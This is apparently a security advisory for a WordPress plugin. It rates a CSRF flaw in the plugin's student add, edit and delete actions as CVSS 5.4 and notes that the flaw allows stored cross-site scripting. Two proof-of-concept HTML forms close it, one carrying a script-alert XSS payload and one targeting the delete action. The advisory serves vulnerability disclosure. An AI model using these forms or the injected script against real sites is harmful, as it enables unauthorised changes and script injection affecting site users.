5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
The plugin does not have CSRF in its AJAX actions, allowing attackers to make logged in user with a role as low as contributor to add/edit and delete students via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site scripting
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?action=ssr_add_st_submit" method="POST">
<input type="hidden" name="rid" value='<script>alert(/XSS/)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?action= ssr_del_st_submit" method="POST">
<input type="hidden" name="postID" value="<RID>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>